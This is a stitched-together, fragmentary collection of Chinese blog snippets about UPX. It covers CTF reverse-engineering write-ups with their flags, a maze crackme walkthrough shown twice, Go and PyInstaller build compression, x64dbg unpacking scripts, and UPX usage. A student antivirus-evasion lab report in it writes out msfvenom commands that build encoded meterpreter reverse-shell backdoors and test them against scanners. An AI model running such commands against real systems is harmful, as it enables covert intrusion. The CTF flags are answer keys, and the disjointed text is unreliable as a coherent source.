upx

　　 1.re1 DUTCTF IDA shift+F12 查看字符串 DUTCTF{We1c0met0DUTCTF} 　　 2.game ZSCTF zsctf{T9is_tOpic_1s_v5ry_int7resting_b6t_others_are_n0t} 3.Hello, CTF Pediy CTF 2018 CrackMeJustForFun 将16进制字符串转ascii字符串得到flag 4.open-source HackYou CTF 参数 51966 25 h4cky0u flag为: c0ffee 5.open-source 9447 CTF 2014 IDA查看字符串 9447{This_is_a_flag} 6.simple-unpack 脱壳搜索字符串 flag{Upx_1s_n0t_a_d3liv3r_c0mp4ny} 7.logmein RC3 CTF 2016 1 v8= " :\"AL_RT^L*.?+6/46 " 2 v7 = ' ebmarah ' [::-1 ] 3 s= '' 4 for i in range(len(v8)): 5 s+=chr(ord(v7[i%7])^ ord(v8[i])) 6 7 print (s) RC3-2016-XORISGUD 8. no-strings-attached 9447 CTF 2014 1

2018-2019-2 网络对抗技术 20165334 Exp3 免杀原理与实践 一、实验内容 任务一正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，利用shellcode编程等免杀工具或技巧 1、使用msf编码器，生成exe文件 使用exp2中生产的后门程序 20165334_backdoor.exe 利用 VirusTotal 网站进行扫描检测。 20165334_backdoor.exe 利用 Virscan 网站进行扫描检测。 -使msf编码器对后门程序进行多次的编码，并检测。 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b ‘\x00’ LHOST=192.168.56.102 LPORT=5334 -f exe > met-lt5334l.exe 用使用virscan进行扫描，结果如下所示 msfvenom生成jar文件 msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=5334 x> ltl_backdoor_java.jar 用使用virscan进行扫描，结果如下所示 msfvenom生成php文件 msfvenom -p php

打包,压缩 我们的常规打包方式 $ go build 　　Mac下我们用 ls -lh查看,可以看到我们打包出来的可执行文件会比较大,一般只写几行代码就回又3M以上的文件大小了. 我们的带压缩的打包方式 $ go build -ldflags '-w -s' 　　Mac下我们用 ls -lh查看,可以看到我们打包出来的文件明显比刚才的小了一些,但是,也有2M之多. 压缩可执行文件(终极压缩) 我们使用第三方的压缩工具 https://github.com/upx/upx/releases , Mac, linux, Windows系统都可以使用, mac下安装 upx brew install upx 　　安装成功以后就可以直接使用 upx 了 $ upx project_name 　　等待压缩完成 此时我们再看可执行文件的大小,即可发现,文件大小只有800kb左右了. 温馨提示 : 压缩出来的可执行文件是和没压缩之前的使用方式是一样的.它只是改变了文件的大小而已 golang的交叉编译 Mac 下编译 Linux 和 Windows 64位可执行程序 CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build main.go

测试文件： https://lanzous.com/ibh0xhi 脱壳 获取信息 32位文件 upx壳 代码分析 看名字就知道，应该就是用几个符号代表方向，让我们走迷宫。打开字符串窗口看了看 星号那段就是迷宫了，总共70个字符。 找到main函数，发现0x40102E有莫名的指令，直接使用OD nop掉，转存到新文件。 得到了新文件，打开main函数 int __cdecl main( int argc, const char **argv, const char ** envp) { signed int i; // [esp+10h] [ebp-14h] char v5[ 16 ]; // [esp+14h] [ebp-10h] sub_401140(aGoThroughTheMa); scanf(a14s, v5); for ( i = 0 ; i <= 13 ; ++ i ) { switch ( v5[i] ) { case ' a ' : -- dword_408078; break ; case ' d ' : ++ dword_408078; break ; case ' s ' : -- dword_40807C; break ; case ' w ' : ++ dword_40807C; break ; default : continue ; } } if

测试文件： https://lanzous.com/ibh0xhi 脱壳 获取信息 32位文件 upx壳 代码分析 看名字就知道，应该就是用几个符号代表方向，让我们走迷宫。打开字符串窗口看了看 星号那段就是迷宫了，总共70个字符。 找到main函数，发现0x40102E有莫名的指令，直接使用OD nop掉，转存到新文件。 得到了新文件，打开main函数 int __cdecl main( int argc, const char **argv, const char ** envp) { signed int i; // [esp+10h] [ebp-14h] char v5[ 16 ]; // [esp+14h] [ebp-10h] sub_401140(aGoThroughTheMa); scanf(a14s, v5); for ( i = 0 ; i <= 13 ; ++ i ) { switch ( v5[i] ) { case ' a ' : -- dword_408078; break ; case ' d ' : ++ dword_408078; break ; case ' s ' : -- dword_40807C; break ; case ' w ' : ++ dword_40807C; break ; default : continue ; } } if

PyInstaller打包python脚本的一些心得 因为在公司经常要帮同事做一个从excel表格中提取出需要的内容的重复工作，比较繁琐还容易出错；于是就想着要写个程序，但是同事又不可能在电脑上也装上python以及相关的包依赖（别人一看就觉得太麻烦而且太冗余），于是就想着将写好的python脚本打包成exe，直接双击使用，方便快捷。 说干就干，先是花点时间写完了脚本；然后搜索了相关的关键词，找到了py2exe、PyInstaller、cx_Freeze等工具，最后确定使用 PyInstaller 。 使用PyInstaller有几个原因： PyInstaller现在仍然在更新 PyInstaller使用方法简单，py2exe比较繁琐 PyInstaller网上教程比较多 安装PyInstaller 推荐使用pip安装 pip install pyinstaller -i https://pypi.douban.com/simple 后面加的 -i https://pypi.douban.com/simple 是使用豆瓣的源镜像，在天朝速度会快很多；如果你担心安全问题或者网速够快，可以不加，使用官方的源。 安装完后，直接 pyinstaller usage: pyinstaller-script.py [-h ] [-v ] [-D ] [-F ] [--specpath DIR

目录 1.the propose knowing the basic technology about anti anti-virus 2.contains: 1.mission one: using msfencoder correctly,generating file end of jar ects via mfsvenom,veil-evasion.learn about how to code through shellcode and the skill we should notice. 1.using shikata_ga_nai to generate. 2.using evil-evasion to generate. 3.using upx to get shell 4.encrypted upx 5. c+shellcode 6.using getwin to generate. 2.mission two:with all kinds of combination to achieve anti anti-virus. 3.with anti-virus software on,hack in a computer successfully and callout with its name,version. 3.Q&A during experiment

目录 LoardPe与Import REC X64dbg脚本 脱壳 Upx 一丶X64dbg调试器与脚本 1.1 起因 1.2 脚本的调试 1.3 Upx脱壳脚本 二丶LoardPe 内存Dump与Import Rec导入表修复工具 2.1 脚本执行到OEP 2.2 LoardPe Dump内存 2.3 Import Rec 进行修复 LoardPe与Import REC X64dbg脚本 脱壳 Upx 将要学习到的内容 x64脱壳脚本的编写 LoarPe 与Import 工具的使用 一丶X64dbg调试器与脚本 1.1 起因 在逛论坛的时候,发现别人发的CrackMe带有UPX压缩,直接进行脱壳. 使用EPS定律即可. 但是 x64Dbg下没有脱壳脚本,为什么使用脱壳脚本.原因是脚本方便.不用做重复动作. 正因为没有脱壳脚本呢.所以进行脱壳脚本的编写. 其实x64Dbg脚本特别简单.直接去官网去看就行. https://help.x64dbg.com/en/latest/commands/index.html 脚本就是模拟人的手工操作. 例如你在调试程序的时候, 单步步过(F8) 那么脚本的命令就是sti 你如果是步进(F7) 那么脚本的命令就是 sto, 例如你通过x64Dbg界面下硬件断点. 那么脚本命令就是(bph) 具体参数可以查一下命令手册. 1.2 脚本的调试

-ldflags go build 编译程序时可以通过 -ldflags 来指定编译参数。 -s 的作用是去掉符号信息。 -w 的作用是去掉调试信息。 测试加与不加 -ldflags 编译出的应用大小。 go build -o tmp/frpc ./cmd/frpc -rwxr-xr-x 1 fate staff 12056092 Dec 10 15:49 frpc go build -ldflags "-s -w" -o tmp/frpc2 ./cmd/frpc -rwxr-xr-x 1 fate staff 8353308 Dec 10 15:49 frpc2 UPX 压缩 在某些设备上动辄接近 10MB 的程序大小还是比较大的，这个时候可以采用 UPX 来进一步压缩。好处是占用磁盘空间小了，坏处是程序启动时会先进行一æ­¥解压缩，将代码还原到内存中，也就是说占用的内存大小并不会减少，当然，对于现代设备来说，启动的耗时几乎可以忽略。 通过各系统的包管理工具一般可以自动安装 UPX。 例如 Centos 上 epel 库 yum install -y upx 。 macos 上通过 brew 安装 brew install upx 。 压缩命令 upx -9 -o ./frpc2_upx ./frpc2 -o 指定压缩后的文件名。 -9 指定压缩级别，1-9。 压缩后的文件体积

来源 https://github.com/upx/upx UPX 命令详解 以下命令源于UPX 3.96 用法 upx [-123456789dlthVL] [-qvfk] [-o file] file... 命令 -1 快速压缩 -9 更好压缩 -d 解压缩 -l 压缩文件列表 -t 测试压缩文件 -V 显示版本号 -h 帮助 -L 显示软件许可 选项 -q 安静模式 -v 详细模式 -o FILE 写输出到"FILE" -f 强制压缩可疑文件 -k 保持备份文件 file... 可执行文件 测试C++编译后文件压缩 源文件 #include <iostream> int main(int argc,char* args[]){ std::cout << "Hello World" << std::endl; return EXIT_SUCCESS; } C:\Users\lotuso\Desktop\upx-3.96-win64>.\upx.exe -9 C:\Users\lotuso\Desktop\a.exe Ultimate Packer for eXecutables Copyright (C) 1996 - 2020 UPX 3.96w Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020 File